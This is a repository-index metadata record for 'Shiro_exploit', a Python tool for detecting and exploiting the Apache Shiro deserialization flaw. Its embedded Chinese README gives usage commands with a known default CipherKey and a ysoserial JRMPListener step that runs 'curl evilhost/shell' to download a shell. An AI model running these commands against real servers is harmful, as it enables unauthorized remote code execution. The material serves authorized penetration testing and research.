{"id":20508661,"url":"https://github.com/insightglacier/shiro_exploit","last_synced_at":"2025-04-05T18:07:37.853Z","repository":{"id":49312708,"uuid":"234908012","full_name":"insightglacier/Shiro_exploit","owner":"insightglacier","description":"Apache Shiro 反序列化漏洞检测与利用工具","archived":false,"fork":false,"pushed_at":"2020-01-29T12:02:47.000Z","size":49832,"stargazers_count":534,"open_issues_count":3,"forks_count":123,"subscribers_count":5,"default_branch":"master","last_synced_at":"2025-03-29T17:07:23.432Z","etag":null,"topics":["crypto","deserialize","exploit","gadget","shiro","vulnerability","vulnerability-research","vulnerability-scanners"],"latest_commit_sha":null,"homepage":"https://bacde.me/post/Apache-Shiro-Deserialize-Vulnerability/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/insightglacier.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-01-19T13:50:32.000Z","updated_at":"2025-03-27T02:35:07.000Z","dependencies_parsed_at":"2022-09-06T03:10:38.503Z","dependency_job_id":null,"html_url":"https://github.com/insightglacier/Shiro_exploit","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/insightglacier%2FShiro_exploit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/insightglacier%2FShiro_exploit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/insightglacier%2FShiro_exploit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/insightglacier%2FShiro_exploit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/insightglacier","download_url":"https://codeload.github.com/insightglacier/Shiro_exploit/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247378141,"owners_count":20929296,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["crypto","deserialize","exploit","gadget","shiro","vulnerability","vulnerability-research","vulnerability-scanners"],"created_at":"2024-11-15T20:19:44.512Z","updated_at":"2025-04-05T18:07:37.828Z","avatar_url":"https://github.com/insightglacier.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Shiro_exploit\n\nShiro_exploit用于检测与利用Apache Shiro反序列化漏洞脚本。可以帮助企业发现自身安全漏洞。\n\n该脚本通过网络收集到的22个key，利用ysoserial工具中的URLDNS这个Gadget，并结合dnslog平台实现漏洞检测。漏洞利用则可以选择Gadget和参数，增强灵活性。\n\n# 环境\n\nPython2.7\n\nrequests\n\nJdk 1.8\n\n# 使用说明\n\n    usage: shiro_exploit.py [-h] -u URL [-t TYPE] [-g GADGET] [-p PARAMS] [-k KEY]\n\n    OPTIONS:\n    -h, --help            show this help message and exit\n    -u URL, --url URL     Target url.\n    -t TYPE, --type TYPE  Check or Exploit. Check :1 , Exploit:2 , Find gadget:3\n    -g GADGET, --gadget GADGET\n                            gadget\n    -p PARAMS, --params PARAMS\n                            gadget params\n    -k KEY, --key KEY     CipherKey\n\n    Example: python shiro_exploit.py -u target\n\n\n检测默认只需要使用-u参数即可。\n\n检测可用gadget的方式可以运行\n\npython shiro_exploit.py -u http://target/ -t 3 -p \"ping -c 2 {dnshost}\" -k \"kPH+bIxk5D2deZiIxcaaaA==\"\n\n程序执行时会获取dnslog的域名替换  `{dnshost}` 这个值。不需要进行修改。目前还没解决windows和linux系统通用性的问题。这里-p自己根据实际情况指定下吧。\n\n![检测可用gadget](images/detector.png)\n\n利用的话，可以采用JRMP的方式。也可以根据检测出来的gadge来进行利用。\n\n服务器：\n\njava -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 'curl evilhost/shell –o shell'\n\n本地：\n\npython shiro_exploit.py -u http://target/ -t 2 -g JRMPClient -p \"remote_host:1099\" -k \"kPH+bIxk5D2deZiIxcaaaA==\"\n\n\n# 常见问题\n1. 运行时出现 No module named 'Crypto'\n\n运行如下命令：\n\n```\npip uninstall crypto pycryptodome\npip install pycryptodome\n```\n\npython安装目录下的\\Lib\\site-packages，将crypto文件夹的名字改成Crypto。\n\n如有其它问题或建议欢迎提交至issue。\n\n工具的思路可以看我的博客文章：\n\n[https://www.bacde.me/post/Apache-Shiro-Deserialize-Vulnerability/](https://www.bacde.me/post/Apache-Shiro-Deserialize-Vulnerability/ \"Apache Shiro 反序列化漏洞实战\")\n\n注：请不要将该脚本用于非法用途，仅用于合法的，经过授权的渗透测试，公司内部安全检查与研究使用。由于使用工具带来的不良后果与本人无关。","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Finsightglacier%2Fshiro_exploit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Finsightglacier%2Fshiro_exploit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Finsightglacier%2Fshiro_exploit/lists"}